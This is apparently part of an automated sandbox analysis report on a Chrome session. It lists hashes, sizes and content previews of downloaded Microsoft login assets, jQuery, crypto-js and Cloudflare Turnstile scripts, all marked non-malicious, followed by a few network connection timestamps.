                                                                  Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):3452
                                                                  Entropy (8bit):5.117912766689607
                                                                  Encrypted:false
                                                                  SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                  MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                  SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                  SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                  SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://login.live.com/Me.htm?v=3
                                                                  Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                  Category:dropped
                                                                  Size (bytes):61052
                                                                  Entropy (8bit):7.996159932827634
                                                                  Encrypted:true
                                                                  SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                  MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                  SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                  SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                  SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                  Category:downloaded
                                                                  Size (bytes):1435
                                                                  Entropy (8bit):7.8613342322590265
                                                                  Encrypted:false
                                                                  SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                  MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                  SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                  SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                  SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                  Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 89 x 8, 8-bit/color RGB, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):61
                                                                  Entropy (8bit):4.035372245524405
                                                                  Encrypted:false
                                                                  SSDEEP:3:yionv//thPlUnDP/7syxl/k4E08up:6v/lhPiDP/oy7Tp
                                                                  MD5:9AB7B18A5FE78385655923AD04C1527D
                                                                  SHA1:B31C7419DB9F512E0D338BC8442200E832B223EA
                                                                  SHA-256:9F5714F5CC9CAED3D2E0B3721997E2588D2C1964521A65FCB65F15FFCF280872
                                                                  SHA-512:51310DC3AE2F545E84375D3A6892D44EB46CAD05B2F9E0C446C88B8C466429CCFC8924B5E08229DA79F098EAB94917BE7550D6C31342E04D21F190507BB0CD58
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:.PNG........IHDR...Y................IDAT.....$.....IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                  Category:dropped
                                                                  Size (bytes):1435
                                                                  Entropy (8bit):7.8613342322590265
                                                                  Encrypted:false
                                                                  SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                  MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                  SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                  SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                  SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                  Category:downloaded
                                                                  Size (bytes):116343
                                                                  Entropy (8bit):7.997640489040715
                                                                  Encrypted:true
                                                                  SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                                  MD5:3063B0DA40B45B46602FCE99AC53D315
                                                                  SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                                  SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                                  SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_27cef08ca792f8e8b149.js
                                                                  Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (65447)
                                                                  Category:dropped
                                                                  Size (bytes):89501
                                                                  Entropy (8bit):5.289893677458563
                                                                  Encrypted:false
                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):3452
                                                                  Entropy (8bit):5.117912766689607
                                                                  Encrypted:false
                                                                  SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                  MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                  SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                  SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                  SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://login.live.com/Me.htm?v=3
                                                                  Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):72
                                                                  Entropy (8bit):4.241202481433726
                                                                  Encrypted:false
                                                                  SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                  MD5:9E576E34B18E986347909C29AE6A82C6
                                                                  SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                  SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                  SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (47520)
                                                                  Category:downloaded
                                                                  Size (bytes):47521
                                                                  Entropy (8bit):5.3981340461317835
                                                                  Encrypted:false
                                                                  SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                  MD5:7C92EC9D1395055CE0405A32607C7291
                                                                  SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                  SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                  SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                  Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                  Category:downloaded
                                                                  Size (bytes):122515
                                                                  Entropy (8bit):7.997419459076181
                                                                  Encrypted:true
                                                                  SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                                  MD5:AC9A6ED508328361A4C9530325A94076
                                                                  SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                  SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                  SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                                  Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):48316
                                                                  Entropy (8bit):5.6346993394709
                                                                  Encrypted:false
                                                                  SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                  Category:downloaded
                                                                  Size (bytes):621
                                                                  Entropy (8bit):7.673946009263606
                                                                  Encrypted:false
                                                                  SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                  MD5:4761405717E938D7E7400BB15715DB1E
                                                                  SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                  SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                  SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                  Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                  Category:dropped
                                                                  Size (bytes):122515
                                                                  Entropy (8bit):7.997419459076181
                                                                  Encrypted:true
                                                                  SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                                  MD5:AC9A6ED508328361A4C9530325A94076
                                                                  SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                  SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                  SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                  No static file info
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 13, 2025 22:37:10.660444975 CET49673443192.168.2.16204.79.197.203
                                                                  Jan 13, 2025 22:37:10.963186026 CET49673443192.168.2.16204.79.197.203
                                                                  Jan 13, 2025 22:37:11.575522900 CET49673443192.168.2.16204.79.197.203
                                                                  Jan 13, 2025 22:37:12.724558115 CET49711443192.168.2.16142.250.185.132
                                                                  Jan 13, 2025 22:37:12.724651098 CET44349711142.250.185.132192.168.2.16
                                                                  Jan 13, 2025 22:37:12.724736929 CET49711443192.168.2.16142.250.185.132
                                                                  Jan 13, 2025 22:37:12.724929094 CET49711443192.168.2.16142.250.185.132
                                                                  Jan 13, 2025 22:37:12.724967003 CET44349711142.250.185.132192.168.2.16
